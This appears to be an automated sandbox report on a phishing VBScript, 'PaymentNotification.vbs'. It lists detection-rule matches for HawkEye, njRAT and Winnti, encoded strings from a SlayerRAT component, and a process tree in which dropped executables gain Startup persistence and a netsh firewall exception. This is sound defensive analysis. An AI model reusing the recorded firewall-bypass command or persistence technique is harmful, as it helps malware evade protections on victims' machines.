Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8150000.11.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8100000.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3068cf8.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research

Source: Tmp.exe.0.dr, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: servieda.exe.1.dr, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs	Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'

Source: classification engine

Classification label: mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_0498268E AdjustTokenPrivileges,	2_2_0498268E
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_04982657 AdjustTokenPrivileges,	2_2_04982657
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC54FA AdjustTokenPrivileges,	13_2_02CC54FA
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC54C3 AdjustTokenPrivileges,	13_2_02CC54C3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,

14_2_0040ED0B

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txt

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_01
Source: C:\Users\user\AppData\Roaming\servieda.exe	Mutant created: \Sessions\1\BaseNamedObjects\d4c6a6df7bab3dad31763de990c4ed82

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Tmp.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: PaymentNotification.vbs	Virustotal: Detection: 12%
Source: PaymentNotification.vbs	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
